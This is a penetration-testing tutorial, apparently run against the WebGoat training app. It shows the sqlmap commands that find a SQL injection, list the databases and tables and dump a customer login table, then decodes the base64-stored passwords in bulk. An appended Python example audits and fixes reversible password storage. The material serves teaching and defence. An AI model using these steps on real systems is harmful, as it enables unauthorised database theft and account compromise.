How Do Hackers Export a Website's Database During a Penetration Test?

Author: FancyPig

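Video walkthrough

How does a hacker find a SQL injection vulnerability during a penetration test and end up exporting the database, which is what we usually call "dumping the database"? This episode explains it in detail:

  • Capturing traffic with BurpSuite and exporting the request
  • Feeding the request to SQLMAP to carry out automated SQL injection
  • Exporting the database with SQLMAP
  • Finally, using a specific decoding method to recover all the account passwords

Illustrated walkthrough

First, open FoxyProxy, the browser extension used alongside BurpSuite, and set it to BurpSuite's proxy port, 8080.

Open BurpSuite and make sure interception is turned on.

Go back to the web page and click the submit button.

The intercepted request now appears, and we can copy it.

You can write it to a file named request.txt with echo, or create the file by hand.

Next, we let sqlmap automatically test the request we just saved for injection: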

sqlmap -r request.txt

sqlmap finds that the request is injectable, so we can go on to export the database:

sqlmap -r request.txt --dbs

Below are the databases we found. Our target here is the webgoat_coins database, with its tables and data.

Continue with the following command:

sqlmap -r request.txt -D webgoat_coins --tables

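This gives us the tables in the webgoat_coins database. We guess that customerlogin probably stores the customers' information.

We try to export the data in the customerlogin table: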

sqlmap -r request.txt -D webgoat_coins -T customerlogin --dump

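We can see the customers' e-mail addresses, accounts, passwords, security questions and more. Looking at the passwords, we find that their lengths are not uniform, so they are not hashes; they have probably only been encoded in some way, most likely base64.

Taking one of them as an example, we decode it: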

echo "MTIzNDU2" | base64 --decode

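We find that the password is actually 123456.

What remains is to decode them in bulk. If you are familiar with the | pipe, this is easy.

First, save the output to a file named password.txt in the same way as before.

Then enter the following command: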

awk '{print $8}' password.txt | base64 --decode

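An invalid input error appears.

After some analysis, we find that it is caused by the | vertical bar in front of each password.

In the end we remove the | vertical bar with tr, using the following command: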

awk '{print $8}' password.txt | tr -d '|' | base64 --decode

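Of course, you can also use other piped commands to put each result on its own line; we won't go into that here.

That completes the password cracking. Do you feel you have learned a lot today?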
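The reasoning used on the customerlogin passwords (varying length, decodes cleanly as base64, therefore encoded rather than hashed) can be turned into a storage audit together with the fix. The Python below is an added example, not part of the original article: the function names and every sample value except MTIzNDU2 are constructed, and PBKDF2-HMAC-SHA256 with 600,000 iterations is an assumed choice of password hash.

```python
import base64
import binascii
import hashlib
import hmac
import os

# Constructed sample column; only "MTIzNDU2" appears in the article.
SAMPLE = ["MTIzNDU2", "bGV0bWVpbg==", "cXdlcnR5MTI="]
ITERATIONS = 600_000  # assumed PBKDF2 work factor


def looks_like_base64_text(value):
    """True if value strictly decodes as base64 to printable ASCII."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return bool(raw) and all(32 <= b < 127 for b in raw)


def audit_column(values):
    """Apply the article's two signals to a stored-password column."""
    return {
        "varying_length": len({len(v) for v in values}) > 1,
        "reversible": bool(values)
        and all(looks_like_base64_text(v) for v in values),
    }


def hash_password(password, salt=None):
    """Salted one-way hash: fixed length, nothing to decode."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2$" + salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    _, salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(candidate.hex(), digest_hex)


if __name__ == "__main__":
    print(audit_column(SAMPLE))  # the encoded column is flagged
    migrated = [hash_password(base64.b64decode(v).decode()) for v in SAMPLE]
    print(audit_column(migrated))  # after migration neither signal fires
```

After migration a dumped column no longer reveals passwords by decoding, and the per-row salt means identical passwords produce different stored values.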
